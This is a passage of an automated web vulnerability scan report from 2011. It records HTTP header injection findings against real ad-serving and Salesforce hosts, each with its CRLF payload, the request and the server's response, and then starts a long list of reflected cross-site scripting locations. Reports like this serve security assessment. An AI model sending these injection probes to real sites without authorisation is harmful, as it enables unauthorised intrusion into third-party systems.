The value of REST URL parameter 1 is copied into the Location response header. The payload 66506%0d%0acee2014b2d9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /66506%0d%0acee2014b2d9/prize.pogo/prizes HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/66506 cee2014b2d9/prize.pogo/prizes: Date: Sun, 09 Jan 2011 02:03:22 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.19. http://ad.doubleclick.net/jump/scrabble.pogo/load [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/scrabble.pogo/load |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 79e85%0d%0a73d9c50a5a7 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /79e85%0d%0a73d9c50a5a7/scrabble.pogo/load;dcopt Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/79e85 73d9c50a5a7/scrabble.pogo/load Date: Sun, 09 Jan 2011 02:03:35 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.20. http://ad.doubleclick.net/jump/scrabble.pogo/room [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/scrabble.pogo/room |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 877c2%0d%0a03fa4dd3a61 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /877c2%0d%0a03fa4dd3a61/scrabble.pogo/room HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/877c2 03fa4dd3a61/scrabble.pogo/room: Date: Sun, 09 Jan 2011 02:03:24 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.21. http://ad.doubleclick.net/jump/surveys.pogo/misc [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /jump/surveys.pogo/misc |
Issue detail
The value of REST URL parameter 1 is copied into the Location response header. The payload 64dc6%0d%0ae88543e460e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.Request
GET /64dc6%0d%0ae88543e460e/surveys.pogo/misc HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t |
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/64dc6 e88543e460e/surveys.pogo/misc: Date: Sun, 09 Jan 2011 02:03:22 GMT Server: GFE/2.0 Connection: close <h1>Error 302 Moved Temporarily</h1> |
2.22. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Banner |
Issue detail
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 452b0%0d%0a6b6ad7cf9b8 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.Request
GET /BurstingPipe/Banner Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 0 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Set-Cookie: eyeblaster=BWVal=&BWDate= 6b6ad7cf9b8; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com Set-Cookie: u2=0a5bbe64-f3a2-4a01 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=0a5bbe64-f3a2-4a01-921a Set-Cookie: C_=BlankImage P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 02:06:27 GMT Connection: close |
2.23. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Bursti |
Issue detail
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 62e1e%0d%0a91a63bf7646 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.Request
GET /BurstingPipe/Bursti Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: eyeblaster=BWVal=&BWDate= |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: A2=gn3Ka4JO09MY0000820wsF Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=1b39b065-3668-4ab4 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=1b39b065-3668-4ab4-a4dc Set-Cookie: eyeblaster=BWVal=&BWDate= 91a63bf7646&FLV=10.1103&RES=128&WMPV P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 02:02:33 GMT Connection: close Content-Length: 0 |
2.24. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Bursti |
Issue detail
The value of the flv request parameter is copied into the Set-Cookie response header. The payload 73be8%0d%0adc5e96035d9 was submitted in the flv parameter. This caused a response containing an injected HTTP header.Request
GET /BurstingPipe/Bursti Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: eyeblaster=BWVal=&BWDate= |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: A2=gn3Ka4JO09MY0000820wsF Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=1b39b065-3668-4ab4 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=1b39b065-3668-4ab4-a4dc Set-Cookie: eyeblaster=BWVal=&BWDate= dc5e96035d9&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 02:02:31 GMT Connection: close Content-Length: 0 |
2.25. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Bursti |
Issue detail
The value of the res request parameter is copied into the Set-Cookie response header. The payload 729cd%0d%0a9fe4d8fa7d8 was submitted in the res parameter. This caused a response containing an injected HTTP header.Request
GET /BurstingPipe/Bursti Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: eyeblaster=BWVal=&BWDate= |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: A2=gn3Ka4JO09MY0000820wsF Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=1b39b065-3668-4ab4 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=1b39b065-3668-4ab4-a4dc Set-Cookie: eyeblaster=BWVal=&BWDate= 9fe4d8fa7d8&WMPV=0; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 02:02:32 GMT Connection: close Content-Length: 0 |
2.26. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/Bursti |
Issue detail
The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 92f47%0d%0a539632693e7 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.Request
GET /BurstingPipe/Bursti Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: eyeblaster=BWVal=&BWDate= |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Vary: Accept-Encoding Set-Cookie: A2=gn3Ka4JO09MY0000820wsF Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=1b39b065-3668-4ab4 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=1b39b065-3668-4ab4-a4dc Set-Cookie: eyeblaster=BWVal=&BWDate= 539632693e7; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 02:02:31 GMT Connection: close Content-Length: 0 |
2.27. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://bs.serving-sys.com |
Path: | /BurstingPipe/adServer.bs |
Issue detail
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 156ae%0d%0a6ce59d4e5ce was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.Request
GET /BurstingPipe/adServer.bs Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a |
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Length: 1722 Content-Type: text/html Expires: Sun, 05-Jun-2005 22:00:00 GMT Set-Cookie: eyeblaster=BWVal=&BWDate= 6ce59d4e5ce; expires=Thu, 31-Dec-2037 22: 00:00 GMT; domain=bs.serving-sys.com Set-Cookie: A2=gn3Ka4Ki09MY0000820wsF Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: E2=09MYgA92sF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: u2=0a5bbe64-f3a2-4a01 Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/ Set-Cookie: U=0a5bbe64-f3a2-4a01-921a P3P: CP="NOI DEVa OUR BUS UNI" Date: Sun, 09 Jan 2011 02:06:32 GMT Connection: close var ebPtcl="http://";var ebBigS="ds.serving-sys ...[SNIP]... |
2.28. http://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.salesforce.com |
Path: | /servlet/servlet |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 39de9%0d%0a757ae29423 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.Request
GET /servlet/39de9%0d%0a757ae29423 HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /servlet/39de9 757ae29423/ Date: Sun, 09 Jan 2011 02:54:11 GMT Connection: close Content-Length: 91 The URL has moved to <a href="/servlet/39de9 757ae29423/">/servlet 757ae29423/</a> |
2.29. https://www.salesforce.com/servlet/servlet.WebToLead [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | https://www.salesforce |
Path: | /servlet/servlet |
Issue detail
The value of REST URL parameter 2 is copied into the Location response header. The payload 46573%0d%0a0d8c9d6be83 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.Request
GET /servlet/46573%0d%0a0d8c9d6be83 HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 301 Moved Permanently Server: SFDC Location: /servlet/46573 0d8c9d6be83/ Date: Sun, 09 Jan 2011 05:28:21 GMT Connection: close Content-Length: 93 The URL has moved to <a href="/servlet/46573 0d8c9d6be83/">/servlet 0d8c9d6be83/</a> |
3. Cross-site scripting (reflected) previous next
There are 712 instances of this issue:
- http://ad.turn.com/server/pixel.htm [fpid parameter]
- http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]
- http://admeld.adnxs.com/usersync [admeld_callback parameter]
- http://ads.adxpose.com/ads/ads.js [uid parameter]
- http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
- http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]
- http://b.scorecardresearch.com/beacon.js [c1 parameter]
- http://b.scorecardresearch.com/beacon.js [c10 parameter]
- http://b.scorecardresearch.com/beacon.js [c15 parameter]
- http://b.scorecardresearch.com/beacon.js [c2 parameter]
- http://b.scorecardresearch.com/beacon.js [c3 parameter]
- http://b.scorecardresearch.com/beacon.js [c4 parameter]
- http://b.scorecardresearch.com/beacon.js [c5 parameter]
- http://b.scorecardresearch.com/beacon.js [c6 parameter]
- http://blog.pandora.com/faq [REST URL parameter 1]
- http://blog.pandora.com/faq/ [REST URL parameter 1]
- http://blog.pandora.com/faq/index.xml [REST URL parameter 1]
- http://blog.pandora.com/faq/index.xml [REST URL parameter 2]
- http://blog.pandora.com/jobs [REST URL parameter 1]
- http://blog.pandora.com/pandora/ [REST URL parameter 1]
- http://blog.pandora.com/pandora/archives/2005/07
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2005/07
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2005/07
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2005/07
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2005/08
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2005/08
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2005/08
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2005/08
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2005/09
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2005/09
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2005/09
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2005/09
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2005/11
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2005/11
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2005/11
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2005/11
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2005/12
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2005/12
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2005/12
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2005/12
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2006/01
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2006/01
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2006/01
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2006/01
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2006/02
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2006/02
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2006/02
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2006/02
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2006/03
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2006/03
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2006/03
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2006/03
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2006/04
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2006/04
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2006/04
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2006/04
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2006/05
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2006/05
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2006/05
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2006/05
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2006/06
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2006/06
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2006/06
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2006/06
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2006/07
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2006/07
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2006/07
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2006/07
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2006/08
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2006/08
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2006/08
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2006/08
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2006/09
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2006/09
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2006/09
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2006/09
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2006/10
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2006/10
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2006/10
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2006/10
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2006/11
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2006/11
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2006/11
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2006/11
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2006/12
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2006/12
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2006/12
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2006/12
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2007/01
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2007/01
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2007/01
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2007/01
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2007/02
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2007/02
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2007/02
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2007/02
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2007/03
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2007/03
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2007/03
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2007/03
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2007/04
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2007/04
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2007/04
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2007/04
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2007/05
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2007/05
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2007/05
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2007/05
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2007/06
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2007/06
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2007/06
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2007/06
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2007/07
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2007/07
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2007/07
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2007/07
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2007/08
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2007/08
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2007/08
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2007/08
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2007/09
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2007/09
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2007/09
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2007/09
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2007/10
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2007/10
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2007/10
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2007/10
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2007/11
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2007/11
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2007/11
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2007/11
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2007/12
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2007/12
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2007/12
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2007/12
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2008/01
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2008/01
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2008/01
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2008/01
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2008/02
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2008/02
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2008/02
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2008/02
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2008/03
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2008/03
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2008/03
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2008/03
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2008/04
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2008/04
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2008/04
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2008/04
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2008/05
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2008/05
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2008/05
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2008/05
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2008/06
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2008/06
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2008/06
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2008/06
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2008/07
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2008/07
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2008/07
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2008/07
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2008/08
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2008/08
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2008/08
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2008/08
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2008/09
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2008/09
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2008/09
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2008/09
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2008/10
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2008/10
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2008/10
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2008/10
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2008/11
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2008/11
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2008/11
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2008/11
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2008/12
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2008/12
/ [REST URL parameter 2] - http://blog.pandora.com/pandora/archives/2008/12
/ [REST URL parameter 3] - http://blog.pandora.com/pandora/archives/2008/12
/ [REST URL parameter 4] - http://blog.pandora.com/pandora/archives/2009/01
/ [REST URL parameter 1] - http://blog.pandora.com/pandora/archives/2009/01
